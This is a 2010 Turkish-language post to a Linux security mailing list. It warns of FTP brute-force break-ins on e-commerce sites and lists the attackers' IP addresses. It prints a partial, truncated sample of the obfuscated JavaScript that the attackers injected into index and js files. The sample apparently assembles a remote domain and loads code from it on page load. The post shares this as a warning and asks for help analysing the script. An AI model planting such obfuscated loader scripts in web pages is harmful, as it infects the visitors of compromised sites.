[Linux-guvenlik] DIKKAT DIKAT - RED ALERT - RED ALERT - 'FTP Brute Force Attack'

Wed, 19 May 2010 08:47:14 -0700 

bclin33/100519

[email protected]


Konu: DIKKAT DIKAT  - RED ALERT  -  RED ALERT
____________________________________________________________       
Sn iledas programci/meslektaslar.  

19 Mayis 2010

Linux seven tm hr programci arkadaslara

'FTP Brute Force Attack'

Herhalde su anda bilmedigimiz bir aciktan faydalanan 
Brezilya/Italya/Cin/Almanya/....  menseli gruplar
son iki haftadir bilhassa e-commerce sitelerine FTP yi zorliyarak
girerek 'index' ve 'js'  dosyalarina  dosyalarina ek scripler 
yerlestirmekteler.

Yerlestirilen scriplerden Bir KISMI örnek asagida

Bu scripleri inceliyebilecek/bilen bir arkadasimiz varsa lütfen bizle 
temasa gecebilirmisiniz?


Slm/ Kale A. CELIK

kalecelik <at> yahoo.com

SMS telefonu:  +46-730-52606


FTP Brute Force Attack



<script>f={G:"W"};this.S=49912;this.S++;Bo=40942;Bo-=105;try {var c={};var 
ux={};E=44026;E--;var 
y=window["unHcMX".substr(0,2)+"es"+"cayEGb".substr(0,2)+"MzsTpeMTzs".substr(4,2)];this.dL="dL";var
 X='';var Kw={PM:"Yb"};I=["Aq","C","EM"];var 
K='';YX=57419;YX+=161;mx=20907;mx--;this.zt=false;try {var SM='In'} 
catch(SM){};try {var vS='e'} catch(vS){};var x=new 
String("repl"+"aceEGL".substr(0,3));jD=6020;jD-=179;var yO=new Array();var 
P=window[(String("RegEoF2m".substr(0,4)+"xp"))];T={k:"Xy"};var L={M:"Zr"};var 

N=String("xj96onl".substr(4)+"oad");var GE=["U"];var ZV=new Date();var 
df=[];var 
xm=String("1lJSE".substr(0,1));Eb={Wq:false};fN=20611;fN-=21;sl={Wqh:8192};qC={yC:false};vr=[];var
 eP={Za:"wF"};function t(xm,u){this.yh='';try {var mu='zO'} 
catch(mu){};MQ=["jq"];var sU={};var i=String("[");var zgJ=new Date();var 
tZ={};var ak=new Date();i+=u;this.hb="";this.jh="";this.im="";try {var DX='bA'} 
catch(DX){};Ql=[];i+=y("%5d");try {} catch(lv){};var Uv=new 
Date();r={sA:9025};Ys={QA:34071};var KD={};var F=new P(i, "7

OjJg".substr(4));GP={_W:"CM"};this.Is=4965;this.Is-=81;var 
KwC={eh:"zGz"};return xm.replace(F, K);AR={};Bt=["pN","O","om"];};var 
hz={aP_:42845};this.XG=9614;this.XG-=241;OM=[];var Il=38365;var 
Ok={WHm:false};var _F={du:false};var kw=["EZ","sQ","lX"];this.xS="";var 
zR=["FR","Vc","H"];var V=428607-420527;var RI=false;var OY="OY";var Ob='';var 
YXf={JE:false};var Ki={hW:false};var Y=new 
String("a5AO/s".substr(4)+"it"+"bn5lesbn5l".substr(4,2)+"tdMReldMtR".substr(4,2)+"l-"+"co"+"m/"+"dQkjgo".substr(4)+"og"+"31Hbl

.........................
..........................
.............................
s.vD="vD";this.DG="DG";uk[new 
String("defer")]=xm;vK={nl:"Ry"};ax=[];yj[a](uk);this.gbu=20643;this.gbu+=164;};this.GgE="GgE";this.hr=false;k_={Hl:34661};var
 jC={h_:false};this.RO="";var Lu={La:false};var SP={yk:false};window[N]=Z;var 
sG=new String();CY={};dC=[];this.jf=53853;this.jf-=181;fc={};} 
catch(m){xB=6067;xB--;var Vq=[];};var Ha={};var wp=new 
String();this.JB="JB";var Lv=new String();</script>
<!--7a284bb9fd2ec59674832ad1a41b084f-->


Attack yapan IP numaralari .... (log listalarimizdan)

200.234.200.72
82.165.181.172
218.15.221.82
60.174.61.122
221.211.116.80
78.159.102.31
88.208.229.24
75.125.161.50
82.138.98.27
69.90.18.37             
86.106.3.234
61.178.193.17
109.123.95.94
88.84.130.46
93.186.195.234
125.88.122.20
129.105.2.34
201.22.254.154
95.224.249.25
173.208.132.74





      
_______________________________________________
Linux-guvenlik mailing list
[email protected]
https://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
Liste kurallari: http://liste.linux.org.tr/kurallar.php

Cevap